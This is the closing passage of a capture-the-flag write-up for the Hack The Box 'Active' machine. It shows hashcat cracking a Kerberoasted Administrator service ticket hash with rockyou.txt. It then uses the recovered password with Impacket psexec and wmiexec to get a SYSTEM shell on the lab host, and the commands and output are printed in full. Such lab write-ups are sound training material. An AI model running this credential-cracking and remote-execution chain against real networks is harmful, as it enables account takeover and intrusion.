9daf167d0983428c2e568bfc9fe87d1e5583cda048428243e17496dc81f3132cf43e62a4d85f59b928e1d02de0c778d76269f8cda7f775edf4b23ad5222a63877c19604725b1275a3fbfb546e1731553bc74a9cab6a2308060f27ad46da8a5
58d5a9fa4dd884b1163b3b68a89a9b982ff3c36469fabe838fbeb8ea54ed9551d923e8069f424b4df9a97146569da0abccf5c540ccf12417e112b0049ba73d440ecb9c779d1580c2f07a98265b6ffc1ca50fb0577e3a25659cac67ac3c6a34
f17e909221373f1064f9ef35c10a85fcb6e35333e46129594ceb976de54884f6ee3c4b7bea85dfbca2c2cb004f2cbcdfc9cf25dc55b6449dd09bf84543365f6d833e2d23ceeb291361c6eb06743968baed1390cc839ff3be43f0d6ca674951
818350b6d49b43e91afa1b0417963a2f3c3335f7e041011732258f92f9e2c6e48e54533009975562a0790df384dfa637e2e4179222a8f7cfb905a00245e14e815f5f7cb0dcf96bba53f79792a7b8814c9d0c8b120a83f0ee5e5797fa88d7fe
7e3f8a7dd8035c43b798ba35169421490b0ff539dfa1e4f733ef0ff37ae6c1caff3207884acdb3dd898ced6c0182de57779153c6cf44038cc5491366f265071b7753b186759db49f1c411a77efefc588a928e44:Ticketmaster1968   
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...928e44
Time.Started.....: Sun Jul  4 05:14:52 2021 (12 secs)
Time.Estimated...: Sun Jul  4 05:15:04 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   960.0 kH/s (7.18ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10551296/14344385 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> TUGGIE

Started: Sun Jul  4 05:14:30 2021
Stopped: Sun Jul  4 05:15:05 2021

This gave the password Ticketmaster1968.

Using smbmap with these credentials showed that we had write access to NETLOGON, SYSVOL, C$ and ADMIN$, meaning that we could use psexec or wmiexec to get a shell on the machine:

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
                                               
[*] Requesting shares on 10.10.10.100.....  
[*] Found writable share ADMIN$
[*] Uploading file bFaeWxCZ.exe         
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service avQJ on 10.10.10.100..... 
[*] Starting service avQJ.....                 
[!] Press help for extra shell commands                                                        
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
                                               
C:\Windows\system32>whoami                                                                     
nt authority\system 

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator

C:\>

That is root on the Active machine from Hack The Box.